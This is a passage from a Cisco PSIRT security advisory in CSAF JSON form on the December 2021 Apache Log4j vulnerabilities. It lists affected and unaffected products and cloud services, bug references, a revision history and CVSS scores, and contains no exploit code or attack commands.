System 2000 Series\r\nCisco Nexus 3000 Series Switches\r\nCisco Nexus 5500 Platform Switches\r\nCisco Nexus 5600 Platform Switches\r\nCisco Nexus 6000 Series Switches\r\nCisco Nexus 7000 Series Switches\r\nCisco Nexus 9000 Series Fabric Switches in Application Centric Infrastructure (ACI) mode\r\nCisco Nexus 9000 Series Switches in standalone NX-OS mode\r\nCisco ONS 15454 Series Multiservice Provisioning Platforms\r\nCisco PDSN/HA Packet Data Serving Node and Home Agent\r\nCisco PGW Packet Data Network Gateway\r\nCisco SD-WAN vBond Controller Software\r\nCisco SD-WAN vEdge 100 Series Routers\r\nCisco SD-WAN vEdge 1000 Series Routers\r\nCisco SD-WAN vEdge 2000 Series Routers\r\nCisco SD-WAN vEdge 5000 Series Routers\r\nCisco SD-WAN vEdge Cloud Router Platform\r\nCisco SD-WAN vSmart Controller Software\r\nCisco System Architecture Evolution Gateway (SAEGW)\r\nCisco Ultra Cloud Core - Access and Mobility Management Function\r\nCisco Ultra Cloud Core - Policy Control Function\r\nCisco Ultra Cloud Core - Redundancy Configuration Manager\r\nCisco Ultra Cloud Core - Session Management Function\r\nCisco Ultra Cloud Core - Subscriber Microservices Infrastructure\r\nCisco Ultra Packet Core\r\nCisco Ultra Services Platform\r\n\r\nRouting and Switching - Small Business\r\n\r\nCisco 220 Series Smart Plus Switches\r\nCisco 250 Series Smart Switches\r\nCisco 350 Series Managed Switches\r\nCisco 550 Series Stackable Managed Switches\r\nCisco Business 220 Series Smart Switches\r\nCisco Business 250 Series Smart Switches\r\nCisco Business 350 Series Managed Switches\r\nCisco Business Dashboard\r\nCisco RV110W Wireless-N VPN Firewall\r\nCisco RV130 VPN Router\r\nCisco RV130W Wireless-N Multifunction VPN Router\r\nCisco RV132W ADSL2+ Wireless-N VPN Router\r\nCisco RV134W VDSL2 Wireless-AC VPN Router\r\nCisco RV160 VPN Router\r\nCisco RV160W Wireless-AC VPN Router\r\nCisco RV215W Wireless-N VPN Router\r\nCisco RV260 VPN Routers\r\nCisco RV260P VPN Router with PoE\r\nCisco RV260W Wireless-AC VPN Router\r\nCisco RV320 Dual Gigabit WAN VPN Router\r\nCisco RV325 Dual Gigabit WAN VPN Router\r\nCisco RV340 Dual WAN Gigabit VPN Router\r\nCisco RV340W Dual WAN Gigabit Wireless-AC VPN Router\r\nCisco RV345 Dual WAN Gigabit VPN Router\r\nCisco RV345P Dual WAN Gigabit POE VPN Router\r\nCisco Small Business 200 Series Smart Switches\r\nCisco Small Business 300 Series Managed Switches\r\nCisco Small Business 500 Series Stackable Managed Switches\r\nCisco WAP125 Wireless-AC Dual Band Desktop Access Point with PoE\r\nCisco WAP150 Wireless-AC/N Dual Radio Access Point with PoE\r\nCisco WAP361 Wireless-AC/N Dual Radio Wall Plate Access Point with PoE\r\nCisco WAP371 Wireless-AC/N Radio Access Point with Single Point Setup\r\nCisco WAP571 Wireless-AC/N Premium Dual Radio Access Point with PoE\r\nCisco WAP571E Wireless-AC/N Premium Dual Radio Outdoor Access Point\r\nCisco WAP581 Wireless-AC Dual Radio Wave 2 Access Point with 2.5GbE LAN\r\n\r\nUnified Computing\r\n\r\nCisco 5000 Series Enterprise Network Compute System (ENCS)\r\nCisco HyperFlex System\r\nCisco Hyperflex Storage Replication Adapter\r\nCisco UCS C-Series Rack Servers and S-Series Storage Servers - Integrated Management Controller (CIMC)\r\nCisco UCS E-Series Servers\r\nCisco UCS Manager\r\n\r\nVoice and Unified Communications Devices\r\n\r\nCisco Headset 500 and 700 Series\r\nCisco Hosted Collaboration Mediation Fulfillment\r\nCisco IP Phones with Multiplatform Firmware\r\nCisco IP Phones\r\nCisco TelePresence Endpoints\r\nCisco Unified Attendant Console Advanced\r\nCisco Unified Attendant Console Business Edition\r\nCisco Unified Attendant Console Department Edition\r\nCisco Unified Attendant Console Enterprise Edition\r\nCisco Unified Attendant Console Premium Edition\r\nCisco Unified Communications Domain Manager\r\nCisco Unity Express\r\nCisco Webex Devices\r\nCisco Webex Hybrid Data Security Node\r\nCisco Webex Video Mesh\r\n\r\nVideo, Streaming, TelePresence, and Transcoding Devices\r\n\r\nCisco Expressway Series\r\nCisco Meeting Management (CMM)\r\nCisco Meeting Server\r\nCisco TelePresence Management Suite\r\nCisco TelePresence Video Communication Server (VCS)\r\nCisco Video Surveillance Media Server\r\n\r\nWireless\r\n\r\nCisco AireOS Wireless LAN Controllers\r\nCisco Aironet Access Points\r\nCisco Business 100 and 200 Series Access Points\r\nCisco Business Wireless\r\nCisco Catalyst 9100 Series Access Points\r\nCisco Catalyst 9800 Series Wireless Controllers\r\nCisco IOS Access Points\r\nCisco Mobility Services Engine\r\nCisco Ultra-Reliable Wireless Backhaul\r\n Cisco Cloud Offerings\r\nCisco investigated its cloud offerings to determine which products may be affected by these vulnerabilities. The following table lists Cisco cloud offerings that were part of this investigation.\r\n\r\n Product CVE-2021-44228 CVE-2021-45046 AppDynamics Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] AppDynamics with Cisco Secure Application Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Remediated - service-specific details [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Cisco Cloud Email Security Not vulnerable Not vulnerable Cisco Cloudlock Remediated Remediated Cisco Cloudlock for Government Remediated Remediated Cisco Cognitive Intelligence Not vulnerable Not vulnerable Cisco Collaboration Experience Service (CES) Not vulnerable Not vulnerable Cisco Collaboration Experience Service Management (CESM) Not vulnerable Not vulnerable Cisco Crosswork Cloud Not vulnerable Not vulnerable Cisco CX Cloud Remediated Remediated Cisco Defense Orchestrator Not vulnerable Not vulnerable Cisco DNA Spaces Remediated Remediated Cisco Intersight Remediated Remediated Cisco IoT Control Center Remediated Remediated Cisco IoT Operations Dashboard Remediated Remediated Cisco Kinetic for Cities Remediated Remediated Cisco Kinetic Gateway Management Module Remediated Remediated Cisco Managed Services Accelerator (MSX) Remediated Remediated Cisco Placetel Not vulnerable Not vulnerable Cisco PX Cloud Remediated Remediated Cisco SD-WAN Cloud Remediated Remediated Cisco SD-WAN vAnalytics Not vulnerable Not vulnerable Cisco Secure Application (integrated with AppDynamics) Not vulnerable [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Not vulnerable [\"https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability\"] Cisco Secure Cloud Analytics, formerly Cisco Stealthwatch Cloud Not vulnerable Not vulnerable Cisco Secure Cloud Insights Not vulnerable Not vulnerable Cisco Secure Email Cloud Mailbox, formerly Cisco Cloud Mailbox Defense Not vulnerable Not vulnerable Cisco Secure Email Encryption Service, formerly Cisco Registered Envelope Service Not vulnerable Not vulnerable Cisco Secure Endpoint, formerly Cisco Advanced Malware Protection for Endpoints Not vulnerable Not vulnerable Cisco Secure Malware Analytics, formerly Cisco Threat Grid Not vulnerable Not vulnerable Cisco SecureX Not vulnerable Not vulnerable Cisco ServiceGrid Not vulnerable Not vulnerable Cisco Smart Net Total Care Remediated Remediated Cisco Umbrella DNS Remediated Remediated Cisco Umbrella SIG Remediated Remediated Cisco Unified Communications Management Cloud - UC Management Remediated Remediated Cisco Unified Communications Manager Cloud Commercial Remediated Remediated Cisco Unified Communications Manager Cloud for Government Remediated Remediated Cisco Webex Calling Remediated Remediated Cisco Webex Calling Carrier Remediated Remediated Cisco Webex Cloud Registered Endpoints Not vulnerable Not vulnerable Cisco Webex Cloud-Connected UC Remediated Remediated Cisco Webex Contact Center Remediated Remediated Cisco Webex Contact Center Enterprise Remediated Remediated Cisco Webex Control Hub Remediated Remediated Cisco Webex Experience Management Not vulnerable Not vulnerable Cisco Webex FedRAMP Remediated Remediated Cisco Webex for Government FedRAMP Remediated Remediated Cisco Webex Meetings Remediated Remediated Cisco Webex Meetings Slow Channel Remediated Remediated Cisco Webex Messaging Remediated Remediated Cisco Webex Site Admin webpage Remediated Remediated Duo Security Remediated Remediated Duo Security for Government Remediated Remediated eSIM Flex Remediated Remediated IMIassist Not vulnerable Not vulnerable IMIcampaign Not vulnerable Not vulnerable IMIconnect Remediated Remediated IMIengage Not vulnerable Not vulnerable IMImessenger/TextLocal Messenger Not vulnerable Not vulnerable IMImobile - Webex Contact Center Integration Remediated Remediated IMInotify Not vulnerable Not vulnerable IMIsocial Not vulnerable Not vulnerable Kenna.AppSec Remediated Remediated Kenna.VI/VI+ Remediated Remediated Kenna.VM Remediated Remediated Meraki Not vulnerable Not vulnerable Partner Supporting Service(PSS) Remediated Remediated Slido Not vulnerable Not vulnerable Smart Call Home(SCH) Remediated Remediated Socio Not vulnerable Not vulnerable ThousandEyes Remediated Remediated UC-One - UMS Not vulnerable Not vulnerable",
"title": "Products Confirmed Not Vulnerable"
},
{
"category": "general",
"text": "Any workarounds are documented in the product-specific Cisco bugs, which are identified in the Vulnerable Products [\"#vp\"] section of this advisory.",
"title": "Workarounds"
},
{
"category": "general",
"text": "For information about fixed software releases, consult the Cisco bugs identified in the Vulnerable Products [\"#vp\"] section of this advisory.\r\n\r\nWhen considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.\r\n\r\nIn all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.",
"title": "Fixed Software"
},
{
"category": "general",
"text": "To learn about Cisco security vulnerability disclosure policies and publications, see the Security Vulnerability Policy [\"https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html\"]. This document also contains instructions for obtaining fixed software and receiving security vulnerability information from Cisco.",
"title": "Vulnerability Policy"
},
{
"category": "general",
"text": "The Cisco Product Security Incident Response Team (PSIRT) is aware that proof-of-concept exploit code is available for the vulnerabilities described in this advisory.",
"title": "Exploitation and Public Announcements"
},
{
"category": "general",
"text": "These vulnerabilities were disclosed by the Apache Software Foundation.",
"title": "Source"
},
{
"category": "legal_disclaimer",
"text": "THIS DOCUMENT IS PROVIDED ON AN \"AS IS\" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.\r\n\r\nA standalone copy or paraphrase of the text of this document that omits the distribution URL is an uncontrolled copy and may lack important information or contain factual errors. The information in this document is intended for end users of Cisco products.",
"title": "Legal Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "psirt@cisco.com",
"issuing_authority": "Cisco PSIRT",
"name": "Cisco",
"namespace": "https://wwww.cisco.com"
},
"references": [
{
"category": "self",
"summary": "Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"
},
{
"category": "external",
"summary": "Cisco Security Vulnerability Policy",
"url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html"
},
{
"category": "external",
"summary": "Apache Log4j Security Vulnerabilities",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "Talos Rules 2021-12-21",
"url": "https://www.snort.org/advisories/talos-rules-2021-12-21"
},
{
"category": "external",
"summary": "Fixed Release Availability",
"url": "https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html#fixes"
},
{
"category": "external",
"summary": "CSCwa47283",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47283"
},
{
"category": "external",
"summary": "CSCwa47272",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47272"
},
{
"category": "external",
"summary": "CSCwa54008",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa54008"
},
{
"category": "external",
"summary": "CSCwa47284",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47284"
},
{
"category": "external",
"summary": "CSCwa46963",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46963"
},
{
"category": "external",
"summary": "CSCwa47133",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47133"
},
{
"category": "external",
"summary": "CSCwa47295",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47295"
},
{
"category": "external",
"summary": "CSCwa48806",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48806"
},
{
"category": "external",
"summary": "CSCwa47269",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47269"
},
{
"category": "external",
"summary": "CSCwa48074",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48074"
},
{
"category": "external",
"summary": "CSCwa47349",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47349"
},
{
"category": "external",
"summary": "CSCwa47350",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47350"
},
{
"category": "external",
"summary": "CSCwa48832",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48832"
},
{
"category": "external",
"summary": "CSCwa47271",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47271"
},
{
"category": "external",
"summary": "CSCwa47257",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47257"
},
{
"category": "external",
"summary": "CSCwa49936",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49936"
},
{
"category": "external",
"summary": "CSCwa49939",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49939"
},
{
"category": "external",
"summary": "CSCwa47367",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47367"
},
{
"category": "external",
"summary": "CSCwa51878",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51878"
},
{
"category": "external",
"summary": "CSCwa47259",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47259"
},
{
"category": "external",
"summary": "CSCwa49482",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49482"
},
{
"category": "external",
"summary": "CSCwa47320",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47320"
},
{
"category": "external",
"summary": "CSCwa47291",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47291"
},
{
"category": "external",
"summary": "CSCwa47310",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47310"
},
{
"category": "external",
"summary": "CSCwa47304",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47304"
},
{
"category": "external",
"summary": "CSCwa47342",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47342"
},
{
"category": "external",
"summary": "CSCwa47299",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47299"
},
{
"category": "external",
"summary": "CSCwa47347",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47347"
},
{
"category": "external",
"summary": "CSCwa52921",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52921"
},
{
"category": "external",
"summary": "CSCwa50021",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50021"
},
{
"category": "external",
"summary": "CSCwa47334",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47334"
},
{
"category": "external",
"summary": "CSCwa49924",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa49924"
},
{
"category": "external",
"summary": "CSCwa47369",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47369"
},
{
"category": "external",
"summary": "CSCwa47322",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47322"
},
{
"category": "external",
"summary": "CSCwa47370",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47370"
},
{
"category": "external",
"summary": "CSCwa47285",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47285"
},
{
"category": "external",
"summary": "CSCwa52235",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa52235"
},
{
"category": "external",
"summary": "CSCwa48793",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa48793"
},
{
"category": "external",
"summary": "CSCwa47745",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47745"
},
{
"category": "external",
"summary": "CSCwa47307",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47307"
},
{
"category": "external",
"summary": "CSCwa47303",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47303"
},
{
"category": "external",
"summary": "CSCwa47288",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47288"
},
{
"category": "external",
"summary": "CSCwa50220",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa50220"
},
{
"category": "external",
"summary": "CSCwa47315",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47315"
},
{
"category": "external",
"summary": "CSCwa51545",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51545"
},
{
"category": "external",
"summary": "CSCwa47383",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47383"
},
{
"category": "external",
"summary": "CSCwa47391",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47391"
},
{
"category": "external",
"summary": "CSCwa47392",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47392"
},
{
"category": "external",
"summary": "CSCwa46459",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46459"
},
{
"category": "external",
"summary": "CSCwa47274",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47274"
},
{
"category": "external",
"summary": "CSCwa47395",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47395"
},
{
"category": "external",
"summary": "CSCwa47249",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47249"
},
{
"category": "external",
"summary": "CSCwa47393",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47393"
},
{
"category": "external",
"summary": "CSCwa46810",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46810"
},
{
"category": "external",
"summary": "CSCwa47273",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47273"
},
{
"category": "external",
"summary": "CSCwa47388",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47388"
},
{
"category": "external",
"summary": "CSCwa47275",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47275"
},
{
"category": "external",
"summary": "CSCwa46525",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa46525"
},
{
"category": "external",
"summary": "CSCwa47265",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47265"
},
{
"category": "external",
"summary": "CSCwa47387",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47387"
},
{
"category": "external",
"summary": "CSCwa47397",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47397"
},
{
"category": "external",
"summary": "CSCwa51476",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa51476"
},
{
"category": "external",
"summary": "CSCwa47360",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47360"
},
{
"category": "external",
"summary": "CSCwa47351",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47351"
},
{
"category": "external",
"summary": "CSCwa47312",
"url": "https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwa47312"
},
{
"category": "external",
"summary": "Remediated - service-specific details",
"url": "https://docs.appdynamics.com/display/PAA/Security+Advisory%3A+Apache+Log4j+Vulnerability"
}
],
"title": "Vulnerabilities in Apache Log4j Library Affecting Cisco Products: December 2021",
"tracking": {
"current_release_date": "2022-01-31T21:16:10+00:00",
"generator": {
"date": "2024-05-10T23:12:04+00:00",
"engine": {
"name": "TVCE"
}
},
"id": "cisco-sa-apache-log4j-qRuKNEbd",
"initial_release_date": "2021-12-10T18:45:00+00:00",
"revision_history": [
{
"date": "2021-12-10T18:49:19+00:00",
"number": "1.0.0",
"summary": "Initial public release."
},
{
"date": "2021-12-10T20:58:15+00:00",
"number": "1.1.0",
"summary": "Added Snort rule link."
},
{
"date": "2021-12-11T00:58:43+00:00",
"number": "1.2.0",
"summary": "Added Products Under Investigation."
},
{
"date": "2021-12-11T19:15:38+00:00",
"number": "1.3.0",
"summary": "Indicated advisory update schedule. Updated the vulnerable products and products confirmed not vulnerable."
},
{
"date": "2021-12-11T23:12:24+00:00",
"number": "1.4.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-12T15:01:39+00:00",
"number": "1.5.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-12T18:11:59+00:00",
"number": "1.6.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-12T19:02:40+00:00",
"number": "1.7.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-12T23:05:52+00:00",
"number": "1.8.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-13T15:31:38+00:00",
"number": "1.9.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-13T20:34:26+00:00",
"number": "1.10.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-13T23:43:56+00:00",
"number": "1.11.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-14T15:42:33+00:00",
"number": "1.12.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-14T19:36:34+00:00",
"number": "1.13.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-14T23:57:07+00:00",
"number": "1.14.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-15T15:08:09+00:00",
"number": "1.15.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-15T19:27:33+00:00",
"number": "1.16.0",
"summary": "Updated the summary, products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-15T23:51:35+00:00",
"number": "1.17.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-16T15:22:33+00:00",
"number": "1.18.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-16T19:07:05+00:00",
"number": "1.19.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-16T23:12:10+00:00",
"number": "1.20.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-17T19:02:40+00:00",
"number": "1.21.0",
"summary": "Updated the summary, products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-18T00:07:30+00:00",
"number": "1.22.0",
"summary": "Updated the products under investigation, vulnerable products, and products confirmed not vulnerable."
},
{
"date": "2021-12-19T16:29:55+00:00",
"number": "1.23.0",
"summary": "Updated summary and products under investigation."
},
{
"date": "2021-12-20T20:29:03+00:00",
"number": "1.24.0",
"summary": "Updated vulnerable products and products confirmed not vulnerable."
},
{
"date": "2021-12-21T20:55:00+00:00",
"number": "1.25.0",
"summary": "Updated vulnerable products and products confirmed not vulnerable."
},
{
"date": "2021-12-22T20:47:44+00:00",
"number": "1.26.0",
"summary": "Updated vulnerable products and products confirmed not vulnerable. Updated the summary to indicate that no Cisco products are affected by CVE-2021-45105."
},
{
"date": "2021-12-22T22:58:15+00:00",
"number": "1.27.0",
"summary": "Updated vulnerable products."
},
{
"date": "2022-01-06T23:16:04+00:00",
"number": "1.28.0",
"summary": "Updated summary and vulnerable products."
},
{
"date": "2022-01-07T18:00:53+00:00",
"number": "1.29.0",
"summary": "Updated vulnerable products."
},
{
"date": "2022-01-10T18:01:02+00:00",
"number": "1.30.0",
"summary": "Updated vulnerable products."
},
{
"date": "2022-01-11T20:28:32+00:00",
"number": "1.31.0",
"summary": "Updated products confirmed not vulnerable."
},
{
"date": "2022-01-31T21:16:10+00:00",
"number": "1.32.0",
"summary": "Updated vulnerable products."
}
],
"status": "final",
"version": "1.32.0"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_family",
"name": "Cisco Unified Communications Manager IM and Presence Service",
"product": {
"name": "Cisco Unified Communications Manager IM and Presence Service ",
"product_id": "CSAFPID-189784"
}
},
{
"category": "product_family",
"name": "Cisco Evolved Programmable Network Manager (EPNM)",
"product": {
"name": "Cisco Evolved Programmable Network Manager (EPNM) ",
"product_id": "CSAFPID-213688"
}
},
{
"category": "product_family",
"name": "Cisco Network Services Orchestrator",
"product": {
"name": "Cisco Network Services Orchestrator ",
"product_id": "CSAFPID-227765"
}
},
{
"category": "product_family",
"name": "Cisco Unified Communications Manager / Cisco Unity Connection",
"product": {
"name": "Cisco Unified Communications Manager / Cisco Unity Connection ",
"product_id": "CSAFPID-277610"
}
}
],
"category": "vendor",
"name": "Cisco"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2021-44832",
"notes": [
{
"category": "other",
"text": "Complete.",
"title": "Affected Product Comprehensiveness"
}
],
"product_status": {
"known_affected": [
"CSAFPID-213688",
"CSAFPID-227765",
"CSAFPID-277610",
"CSAFPID-189784"
]
},
"remediations": [
{
"category": "vendor_fix",
"details": "Cisco has released software updates that address this vulnerability.",
"product_ids": [
"CSAFPID-189784",
"CSAFPID-213688",
"CSAFPID-227765",
"CSAFPID-277610"
],
"url": "https://software.cisco.com"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-213688",
"CSAFPID-227765",
"CSAFPID-277610",
"CSAFPID-189784"
]
}
],
"title": "vuln-CVE-2021-44832"
},
{
"cve": "CVE-2021-45046",
"ids": [
{
"system_name": "Cisco Bug ID",
"text": "CSCwa47310"
},
{
"system_name": "Cisco Bug ID",
"text": "CSCwa56230"
}
],
"notes": [
{
"category": "other",
"text": "Complete.",
"title": "Affected Product Comprehensiveness"
}
],
"product_status": {
"known_affected": [
"CSAFPID-227765",
"CSAFPID-277610",
"CSAFPID-213688",
"CSAFPID-189784"
]
},
"remediations": [
{
"category": "vendor_fix",
"details": "Cisco has released software updates that address this vulnerability.",
"product_ids": [
"CSAFPID-189784",
"CSAFPID-213688",
"CSAFPID-227765",
"CSAFPID-277610"
],
"url": "https://software.cisco.com"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-227765",
"CSAFPID-277610",
"CSAFPID-213688",
"CSAFPID-189784"
]
}
],
"title": "vuln-CVE-2021-45046"
},
{
"cve": "CVE-2021-44228",
"ids": [
{
"system_name": "Cisco Bug ID",
"text": "CSCwa56230"
}
],
"notes": [
{
"category": "other",
"text": "Complete.",
"title": "Affected Product Comprehensiveness"
}
],
"product_status": {
"known_affected": [
"CSAFPID-277610",
"CSAFPID-189784"
]
},
"remediations": [
{
"category": "vendor_fix",
"details": "Cisco has released software updates that address this vulnerability.",
"product_ids": [
"CSAFPID-189784",
"CSAFPID-277610"
],
"url": "https://software.cisco.com"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 10.0,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-277610",
"CSAFPID-189784"
]
}
],
"title": "Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021"
},
{
"cve": "CVE-2021-45105",
"ids": [
{
"system_name": "Cisco Bug ID",
"text": "CSCwa56230"
},
{
"system_name": "Cisco Bug ID",
"text": "CSCwa54650"
},
{
"system_name": "Cisco Bug ID",
"text": "CSCwa47310"
}
],
"notes": [
{
"category": "other",
"text": "Complete.",
"title": "Affected Product Comprehensiveness"
}
],
"product_status": {
"known_affected": [
"CSAFPID-189784",
"CSAFPID-213688"
]
},
"remediations": [
{
"category": "vendor_fix",
"details": "Cisco has released software updates that address this vulnerability.",
"product_ids": [
"CSAFPID-189784",
"CSAFPID-213688"
],
"url": "https://software.cisco.com"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-189784",
"CSAFPID-213688"
]
}
],
